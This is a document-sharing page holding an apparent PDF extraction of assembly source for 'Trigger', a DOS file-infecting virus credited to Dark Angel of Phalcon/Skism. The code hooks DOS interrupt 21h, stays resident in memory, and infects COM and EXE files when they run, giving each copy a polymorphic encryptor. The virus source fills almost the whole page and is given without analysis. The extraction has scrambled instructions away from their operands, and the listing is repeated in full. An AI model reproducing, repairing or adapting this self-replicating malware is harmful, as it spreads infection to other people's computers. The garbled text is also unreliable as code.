Trigger
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Trigger as PDF for free.
More details
- Words: 923
- Pages: 9
.model
entry: next:
tiny .code .radix org
viruslength virussizek virussizepara
= = =
(heap - entry) (endvirus - entry + 3ff) / 400 (virussizek)*40
exe_id
=
'ps'
call
past
db db db
0,"trigger by dark angel of phalcon/skism",0dh,0a "utilising dark angel's multiple encryptor (dame)",0dh,0a 0dh,0a,0
checkstub past:
trigger:
16 0
db 72,0fa,0e,1f,0ba,00,0b8,0b8,40,00,8e,0c0,26,81,3e,63
cld pop
bp
mov mov int cmp jnz
ax,0cf0 bx,'da' 21 bx,'gh' no_trigger
push push
ds es
push pop xor checkagain: lea mov xor mov rep jz inc cmp jb jmp trigger_it: mov mov mov push mov jmp db dw patch dw pop mov
cs ds ax,ax si,[bp+checkstub-next] es,ax di,di cx,8 cmpsw trigger_it ax ax,0a000 checkagain exit_trigger [bp+patch-next],ax ds,ax byte ptr ds:73,0cbh bp bp,-80 short $+2 09a ; call far ptr 1 ? bp byte ptr ds:73,1f
exit_trigger: pop pop jmp
es ds short restore
no_trigger: mov int cmp jz
ax,4b90 21 ax,bx restore
push push
ds es
mov dec mov sub sub mov
ax,ds ax ds,ax word ptr ds:3,virussizepara word ptr ds:12,virussizepara es,ds:12
push pop
cs ds
xor lea mov rep
di,di si,[bp+offset entry-offset next] cx,(viruslength + 1)/2 movsw
xor mov sub
ax,ax ds,ax word ptr ds:413,virussizek
mov mov movsw movsw
di,offset oldint21 si,21*4
cli pushf pushf pop or push
ax ah,1 ax
mov mov
ds:1*4+2,es word ptr ds:1*4,offset int1_1
popf mov pushf call
ah,30 dword ptr ds:21*4
popf lds
si,dword ptr es:oldint21
mov lodsw mov lodsw mov lodsb mov
di,si
push push pop pop
ds ; es:di->int 21 handler es ds ; ds->high segment es
mov stosb mov stosw mov stosw sti
al,0ea
pop pop
es ds
word ptr es:int21patch1,ax word ptr es:int21patch2,ax byte ptr es:int21patch3,al
ax,offset int21 ax,ds
restore: cmp jnz restorecom: lea mov push movsw movsw ret restoreexe: mov add add add mov mov jmp
sp,-2 restoreexe
readbuffer
dw 20cdh dw 0bh dup (?)
si,[bp+readbuffer-next] di,100 di
ax,ds ax,10 cs:[bp+readbuffer+16-next], ax ax,cs:[bp+readbuffer+0e-next] ss,ax sp,cs:[bp+readbuffer+10-next] dword ptr cs:[bp+readbuffer+14-next]
int1_1: push mov push mov cmp jae mov mov mov exitint1:
bp bp,sp ax ax, [bp+4] ; get segment ax, cs:oldint21+2 exitint1 cs:oldint21+2,ax ax, [bp+2] cs:oldint21,ax
pop pop iret
ax bp
push mov push
bp bp,sp ax
mov cmp jz
ax,cs ax,[bp+4] exitint1
mov cmp jnz
ax,[bp+4] ax,cs:oldint21+2 int1_2_restore
int1_2:
mov cmp jb sub cmp jbe int1_2_restore: push push cld les mov stosb mov stosw mov stosw pop pop
ax,[bp+2] ax,cs:oldint21 int1_2_restore ax,5 ax,cs:oldint21 exitint1 es di di,dword ptr cs:oldint21 al,0ea ax,offset int21 ax,cs di es
and jmp
[bp+6],0feff exitint1
mov iret
bx,ax
cmp jz
ax,4b90 install
install: int21:
push push lds mov int21patch1 mov int21patch2 mov int21patch3 pop pop
ds di di,dword word ptr = word ptr = byte ptr = di ds
ptr cs:oldint21 ds:[di],1234 $ - 2 ds:[di+2],1234 $ - 2 ds:[di+4],12 $ - 1
cld cmp jz exitint21: push push xor mov cli mov mov sti pushf pop or push popf pop pop db oldint21 dw callint21: pushf call ret
ax,4b00 infect ds ax ax,ax ds,ax word ptr ds:1*4,offset int1_2 ds:1*4+2,cs
ax ah,1 ax ax ds 0ea 0, 0
dword ptr cs:oldint21
already_infected: pop dx pop cx mov ax,5701 call callint21 mov call exitnoclose: mov pop pop pop call exitinfect: pop pop pop pop pop pop pop pop pop jmp
ah,3e callint21 ax,4301 dx ds cx callint21 es ds di si bp bx dx cx ax exitint21
infect:
push push push push push push push push push
ax cx dx bx bp si di ds es
mov call push push push
ax,4300 callint21 cx ds dx
mov xor call
ax,4301 cx,cx callint21
mov call jc xchg
ax,3d02 callint21 exitnoclose ax,bx
mov int push push
ax,5700 21 cx dx
mov mov push pop push pop mov mov call jc
ah,3f cx,18 cs ds cs es dx,offset readbuffer si,dx callint21 already_infected
mov mov
di,offset writebuffer cx,18/2
push push
si di
rep
movsw
pop pop
di si
mov xor cwd int
ax,4202 cx,cx 21
cmp jnz
word ptr [di],'zm' infectcom
infectexe: cmp readbuffer+10,exe_id go_already_infected: jz already_infected mov mov
ds:writebuffer+4,ax ds:writebuffer+2,dx
mov div
cx,10 cx
sub
ax,ds:writebuffer+8
mov mov
ds:writebuffer+14,dx ds:writebuffer+16,ax
xchg
cx,dx
mov mov
ds:writebuffer+0e,ax ds:writebuffer+10,exe_id
mov jmp
al,10b finishinfect
infectcom: ; si = readbuffer, di = writebuffer push ax mov cx,4 xor dx,dx check_infection_loop: lodsb add dl,al loop check_infection_loop pop
ax
or jz
dl,dl go_already_infected
mov cmp jnb
dx,18 ax,dx no_fixup_com
mov xor int no_fixup_com: mov inc sub push mov stosb pop
ax,4200 cx,cx 21 cx,ax ch ax,3 ax al,0e9 ax
; add cx,100
stosw add add neg stosb
al,ah al,0e9 al
mov al,11b finishinfect: cbw ; ax = bitmask ; bx = start decrypt in carrier file ; cx = encrypt length ; dx = start encrypt in virus ; si = buffer to put decryption routine ; di = buffer to put encryption routine push bx xchg
cx,bx
xor mov mov rep
si,si di,offset copyvirus cx,(heap-entry+1)/2 movsw
push call pop
ax rnd_init_seed ax
mov mov mov mov call
dx,offset copyvirus cx,viruslength si,offset _decryptbuffer di,offset _encryptbuffer dame
push
cx
cmp jnz
ds:writebuffer,'zm' no_fix_header
mov mov add add adc mov div or jz inc nohiccup: mov mov no_fix_header: call pop pop
dx,ds:writebuffer+2 ax,ds:writebuffer+4 cx,viruslength ax,cx dx,0 cx,200 cx dx,dx nohiccup ax ds:writebuffer+4,ax ds:writebuffer+2,dx di cx bx
mov mov call
ah,40 dx,offset _decryptbuffer callint21
mov mov mov call
ah,40 cx,viruslength dx,offset copyvirus callint21
mov xor cwd int
ax,4200 cx,cx
mov mov mov call jmp
ah,40 cx,18 dx,offset writebuffer callint21 already_infected
21
vars = 0 include dame.asm heap: vars = 1 include dame.asm writebuffer _encryptbuffer: _decryptbuffer: copyvirus endvirus: end entry
dw db db db db
0c dup (?) 80 dup (?) 180 dup (?) viruslength dup (?) 20 dup (?)
entry: next:
tiny .code .radix org
viruslength virussizek virussizepara
= = =
(heap - entry) (endvirus - entry + 3ff) / 400 (virussizek)*40
exe_id
=
'ps'
call
past
db db db
0,"trigger by dark angel of phalcon/skism",0dh,0a "utilising dark angel's multiple encryptor (dame)",0dh,0a 0dh,0a,0
checkstub past:
trigger:
16 0
db 72,0fa,0e,1f,0ba,00,0b8,0b8,40,00,8e,0c0,26,81,3e,63
cld pop
bp
mov mov int cmp jnz
ax,0cf0 bx,'da' 21 bx,'gh' no_trigger
push push
ds es
push pop xor checkagain: lea mov xor mov rep jz inc cmp jb jmp trigger_it: mov mov mov push mov jmp db dw patch dw pop mov
cs ds ax,ax si,[bp+checkstub-next] es,ax di,di cx,8 cmpsw trigger_it ax ax,0a000 checkagain exit_trigger [bp+patch-next],ax ds,ax byte ptr ds:73,0cbh bp bp,-80 short $+2 09a ; call far ptr 1 ? bp byte ptr ds:73,1f
exit_trigger: pop pop jmp
es ds short restore
no_trigger: mov int cmp jz
ax,4b90 21 ax,bx restore
push push
ds es
mov dec mov sub sub mov
ax,ds ax ds,ax word ptr ds:3,virussizepara word ptr ds:12,virussizepara es,ds:12
push pop
cs ds
xor lea mov rep
di,di si,[bp+offset entry-offset next] cx,(viruslength + 1)/2 movsw
xor mov sub
ax,ax ds,ax word ptr ds:413,virussizek
mov mov movsw movsw
di,offset oldint21 si,21*4
cli pushf pushf pop or push
ax ah,1 ax
mov mov
ds:1*4+2,es word ptr ds:1*4,offset int1_1
popf mov pushf call
ah,30 dword ptr ds:21*4
popf lds
si,dword ptr es:oldint21
mov lodsw mov lodsw mov lodsb mov
di,si
push push pop pop
ds ; es:di->int 21 handler es ds ; ds->high segment es
mov stosb mov stosw mov stosw sti
al,0ea
pop pop
es ds
word ptr es:int21patch1,ax word ptr es:int21patch2,ax byte ptr es:int21patch3,al
ax,offset int21 ax,ds
restore: cmp jnz restorecom: lea mov push movsw movsw ret restoreexe: mov add add add mov mov jmp
sp,-2 restoreexe
readbuffer
dw 20cdh dw 0bh dup (?)
si,[bp+readbuffer-next] di,100 di
ax,ds ax,10 cs:[bp+readbuffer+16-next], ax ax,cs:[bp+readbuffer+0e-next] ss,ax sp,cs:[bp+readbuffer+10-next] dword ptr cs:[bp+readbuffer+14-next]
int1_1: push mov push mov cmp jae mov mov mov exitint1:
bp bp,sp ax ax, [bp+4] ; get segment ax, cs:oldint21+2 exitint1 cs:oldint21+2,ax ax, [bp+2] cs:oldint21,ax
pop pop iret
ax bp
push mov push
bp bp,sp ax
mov cmp jz
ax,cs ax,[bp+4] exitint1
mov cmp jnz
ax,[bp+4] ax,cs:oldint21+2 int1_2_restore
int1_2:
mov cmp jb sub cmp jbe int1_2_restore: push push cld les mov stosb mov stosw mov stosw pop pop
ax,[bp+2] ax,cs:oldint21 int1_2_restore ax,5 ax,cs:oldint21 exitint1 es di di,dword ptr cs:oldint21 al,0ea ax,offset int21 ax,cs di es
and jmp
[bp+6],0feff exitint1
mov iret
bx,ax
cmp jz
ax,4b90 install
install: int21:
push push lds mov int21patch1 mov int21patch2 mov int21patch3 pop pop
ds di di,dword word ptr = word ptr = byte ptr = di ds
ptr cs:oldint21 ds:[di],1234 $ - 2 ds:[di+2],1234 $ - 2 ds:[di+4],12 $ - 1
cld cmp jz exitint21: push push xor mov cli mov mov sti pushf pop or push popf pop pop db oldint21 dw callint21: pushf call ret
ax,4b00 infect ds ax ax,ax ds,ax word ptr ds:1*4,offset int1_2 ds:1*4+2,cs
ax ah,1 ax ax ds 0ea 0, 0
dword ptr cs:oldint21
already_infected: pop dx pop cx mov ax,5701 call callint21 mov call exitnoclose: mov pop pop pop call exitinfect: pop pop pop pop pop pop pop pop pop jmp
ah,3e callint21 ax,4301 dx ds cx callint21 es ds di si bp bx dx cx ax exitint21
infect:
push push push push push push push push push
ax cx dx bx bp si di ds es
mov call push push push
ax,4300 callint21 cx ds dx
mov xor call
ax,4301 cx,cx callint21
mov call jc xchg
ax,3d02 callint21 exitnoclose ax,bx
mov int push push
ax,5700 21 cx dx
mov mov push pop push pop mov mov call jc
ah,3f cx,18 cs ds cs es dx,offset readbuffer si,dx callint21 already_infected
mov mov
di,offset writebuffer cx,18/2
push push
si di
rep
movsw
pop pop
di si
mov xor cwd int
ax,4202 cx,cx 21
cmp jnz
word ptr [di],'zm' infectcom
infectexe: cmp readbuffer+10,exe_id go_already_infected: jz already_infected mov mov
ds:writebuffer+4,ax ds:writebuffer+2,dx
mov div
cx,10 cx
sub
ax,ds:writebuffer+8
mov mov
ds:writebuffer+14,dx ds:writebuffer+16,ax
xchg
cx,dx
mov mov
ds:writebuffer+0e,ax ds:writebuffer+10,exe_id
mov jmp
al,10b finishinfect
infectcom: ; si = readbuffer, di = writebuffer push ax mov cx,4 xor dx,dx check_infection_loop: lodsb add dl,al loop check_infection_loop pop
ax
or jz
dl,dl go_already_infected
mov cmp jnb
dx,18 ax,dx no_fixup_com
mov xor int no_fixup_com: mov inc sub push mov stosb pop
ax,4200 cx,cx 21 cx,ax ch ax,3 ax al,0e9 ax
; add cx,100
stosw add add neg stosb
al,ah al,0e9 al
mov al,11b finishinfect: cbw ; ax = bitmask ; bx = start decrypt in carrier file ; cx = encrypt length ; dx = start encrypt in virus ; si = buffer to put decryption routine ; di = buffer to put encryption routine push bx xchg
cx,bx
xor mov mov rep
si,si di,offset copyvirus cx,(heap-entry+1)/2 movsw
push call pop
ax rnd_init_seed ax
mov mov mov mov call
dx,offset copyvirus cx,viruslength si,offset _decryptbuffer di,offset _encryptbuffer dame
push
cx
cmp jnz
ds:writebuffer,'zm' no_fix_header
mov mov add add adc mov div or jz inc nohiccup: mov mov no_fix_header: call pop pop
dx,ds:writebuffer+2 ax,ds:writebuffer+4 cx,viruslength ax,cx dx,0 cx,200 cx dx,dx nohiccup ax ds:writebuffer+4,ax ds:writebuffer+2,dx di cx bx
mov mov call
ah,40 dx,offset _decryptbuffer callint21
mov mov mov call
ah,40 cx,viruslength dx,offset copyvirus callint21
mov xor cwd int
ax,4200 cx,cx
mov mov mov call jmp
ah,40 cx,18 dx,offset writebuffer callint21 already_infected
21
vars = 0 include dame.asm heap: vars = 1 include dame.asm writebuffer _encryptbuffer: _decryptbuffer: copyvirus endvirus: end entry
dw db db db db
0c dup (?) 80 dup (?) 180 dup (?) viruslength dup (?) 20 dup (?)
